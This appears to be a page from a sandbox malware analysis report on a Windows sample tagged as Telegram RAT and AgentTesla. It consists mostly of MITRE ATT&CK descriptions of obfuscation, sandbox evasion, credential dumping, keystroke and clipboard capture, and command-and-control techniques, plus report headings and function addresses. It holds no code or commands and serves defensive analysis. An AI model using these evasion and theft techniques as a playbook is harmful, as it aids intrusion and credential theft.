Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002A_127.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LisectAVT_2403002A_127.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
LisectAVT_2403002A_127.exe

Function 054AEAEE Relevance: 1.8, Strings: 1, Instructions: 562
COMMON

Function 0172ADA8 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Function 017244E4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0172590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0172B790 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0172D678 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 0172A168 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 0172B219 Relevance: 1.6, APIs: 1, Instructions: 52
libraryCOMMON

Function 02F12BB4 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 02F137C0 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 02F11780 Relevance: 1.5, APIs: 1, Instructions: 47
windowCOMMON

Function 0172AF98 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 02F11788 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre